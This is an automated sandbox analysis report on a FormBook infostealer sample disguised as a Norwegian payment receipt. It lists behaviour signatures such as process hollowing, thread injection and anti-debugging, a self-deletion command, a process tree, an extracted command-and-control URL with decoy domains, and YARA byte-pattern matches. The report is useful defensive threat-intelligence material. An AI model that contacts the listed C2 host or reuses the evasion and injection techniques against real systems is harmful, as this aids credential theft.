Play interactive tour

Edit tour

Windows Analysis Report Betalingskvittering.exe

Overview

General Information

Sample Name:	Betalingskvittering.exe
Analysis ID:	510324
MD5:	ff904170ad5767db6b6066400972cc99
SHA1:	ae326e46c0a7649659faca436ddefc232f3f18d7
SHA256:	ee4b441c93ac2eb13f0cc02b060836e8538fa08bc434cf8b87552f820dc8563e
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

Betalingskvittering.exe (PID: 6364 cmdline: 'C:\Users\user\Desktop\Betalingskvittering.exe' MD5: FF904170AD5767DB6B6066400972CC99)

Betalingskvittering.exe (PID: 6404 cmdline: 'C:\Users\user\Desktop\Betalingskvittering.exe' MD5: FF904170AD5767DB6B6066400972CC99)

explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 6836 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6928 cmdline: /c del 'C:\Users\user\Desktop\Betalingskvittering.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bbyyn10.xyz/b0us/"], "decoy": ["wxoi.xyz", "boss-note-to-look-today.info", "rxgmarket.com", "vyfstudio.com", "insularrofioa.xyz", "psikologtenaysude.com", "hepatitiscsignssymptoms.space", "toadvalleyfarm.com", "rhinobeds.com", "joystoreworld.com", "wethinky.com", "cucciolamores.com", "finansresultation.com", "criptodigital.online", "cave21shop.com", "ryannaat.xyz", "xn--ngbr0em.com", "olympiaapartment.com", "asrendo.com", "dashmints.com", "hampadco.com", "hoanghuong.group", "yamamoto-d-c.net", "cynthiaessential.com", "malatirada.com", "c5group-th.com", "v9ayiditq3.com", "tucows.website", "patinamedicalgroup.com", "xn--vckvb6c8f088nlxg8mqrw1d.com", "securetravel.trade", "eachallness.center", "vongquaymembersshipvn.com", "sexbattu.com", "libertymattersmost.net", "improvfilmproduction.com", "cryptohealthplan.com", "pandabearsoftware.com", "mininoheya.com", "chimichael.com", "rescueandrestoreministries.net", "alookbehindtheseams.com", "unimedplanos.net", "bobazzing.com", "cabidat.xyz", "playgroundcrew.website", "tsoharformation.com", "ninjadigital.agency", "inkedbreadcompany.com", "kirieducationschool.com", "genitalestetikbodrum.com", "agronotion.com", "bentonvillesquareartist.com", "harekrishnajapayagna.com", "fflashes.net", "stogelair.com", "stkittsaquaculture.com", "peiyaousa.com", "publicschools.fail", "bankhelpassist.xyz", "ip-sat.com", "redeyeops.com", "kavirab.com", "thefurniturepractice-btr.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.1.Betalingskvittering.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.Betalingskvittering.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.Betalingskvittering.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
1.1.Betalingskvittering.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.Betalingskvittering.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.Betalingskvittering.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.0.Betalingskvittering.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.Betalingskvittering.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.Betalingskvittering.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
0.2.Betalingskvittering.exe.f010000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Betalingskvittering.exe.f010000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Betalingskvittering.exe.f010000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
1.0.Betalingskvittering.exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
